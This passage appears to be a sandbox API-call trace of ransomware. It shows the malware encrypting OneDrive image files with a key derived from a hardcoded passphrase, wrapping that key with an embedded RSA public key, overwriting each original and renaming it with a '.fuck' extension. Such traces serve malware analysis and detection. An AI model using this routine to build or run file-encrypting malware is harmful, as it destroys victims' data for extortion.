(normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png.gsg")) returned 1 [0276.949] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png.fuck")) returned 1 [0276.950] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.950] CryptDestroyKey (hKey=0x2fb488) returned 1 [0276.950] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0276.950] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.951] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.951] GetLastError () returned 0x0 [0276.951] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg")) returned 0x20 [0276.951] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg", dwFileAttributes=0x80) returned 1 [0276.951] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.953] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.954] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg", dwFileAttributes=0x2) returned 1 [0276.954] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0276.957] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.957] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.957] CryptHashData (hHash=0x2fa748, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.957] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0276.957] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.957] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.958] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b950) returned 1 [0276.958] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b950, dwCertEncodingType=0x1, pInfo=0x2f354f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35520*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35528*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb488) returned 1 [0276.958] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.958] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b9d8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b9d8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.959] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2b9d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b9d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.961] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0xd3, lpOverlapped=0x0) returned 1 [0276.962] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0xd3, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0276.962] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0276.962] CloseHandle (hObject=0x5d3c) returned 1 [0276.962] CloseHandle (hObject=0x5d48) returned 1 [0276.963] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg"), bFailIfExists=0) returned 1 [0276.967] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg", dwFileAttributes=0x0) returned 1 [0276.967] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg.gsg")) returned 1 [0276.969] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_finished.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_finished.svg.fuck")) returned 1 [0276.971] CryptDestroyHash (hHash=0x2fa748) returned 1 [0276.971] CryptDestroyKey (hKey=0x2fb688) returned 1 [0276.971] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0276.971] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.971] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.971] GetLastError () returned 0x0 [0276.971] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg")) returned 0x20 [0276.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg", dwFileAttributes=0x80) returned 1 [0276.973] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.973] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.975] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg", dwFileAttributes=0x2) returned 1 [0276.976] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0276.979] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.979] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.979] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.979] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0276.979] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.979] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.979] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ba60) returned 1 [0276.980] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ba60, dwCertEncodingType=0x1, pInfo=0x2f350e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35110*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35118*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb248) returned 1 [0276.980] CryptEncrypt (in: hKey=0x2fb248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.980] CryptEncrypt (in: hKey=0x2fb248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2bbf8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2bbf8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.980] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2bbf8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2bbf8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.981] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x186, lpOverlapped=0x0) returned 1 [0276.983] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x186, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x190) returned 1 [0276.983] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x190, lpOverlapped=0x0) returned 1 [0276.983] CloseHandle (hObject=0x5d48) returned 1 [0276.983] CloseHandle (hObject=0x5d3c) returned 1 [0276.983] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg"), bFailIfExists=0) returned 1 [0276.987] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg", dwFileAttributes=0x0) returned 1 [0276.988] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.gsg")) returned 1 [0276.989] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_hovered.svg.fuck")) returned 1 [0276.990] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.990] CryptDestroyKey (hKey=0x2fb688) returned 1 [0276.990] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0276.990] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.991] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.991] GetLastError () returned 0x0 [0276.991] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg")) returned 0x20 [0276.992] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg", dwFileAttributes=0x80) returned 1 [0276.992] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.993] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.994] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg", dwFileAttributes=0x2) returned 1 [0276.995] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0276.997] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.997] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.997] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.997] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0276.998] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.998] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.998] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2bd90) returned 1 [0276.998] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2bd90, dwCertEncodingType=0x1, pInfo=0x2f34a60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34a90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34a98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb848) returned 1 [0276.998] CryptEncrypt (in: hKey=0x2fb848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.999] CryptEncrypt (in: hKey=0x2fb848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2be18*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2be18*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2be18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2be18*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.000] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x187, lpOverlapped=0x0) returned 1 [0277.002] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x187, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x190) returned 1 [0277.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x190, lpOverlapped=0x0) returned 1 [0277.002] CloseHandle (hObject=0x5d3c) returned 1 [0277.002] CloseHandle (hObject=0x5d48) returned 1 [0277.002] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg"), bFailIfExists=0) returned 1 [0277.006] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg", dwFileAttributes=0x0) returned 1 [0277.006] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.gsg")) returned 1 [0277.007] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_in_progress.svg.fuck")) returned 1 [0277.009] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.009] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.009] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.009] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.009] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.009] GetLastError () returned 0x0 [0277.009] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg")) returned 0x20 [0277.010] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg", dwFileAttributes=0x80) returned 1 [0277.010] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.011] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.012] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.013] 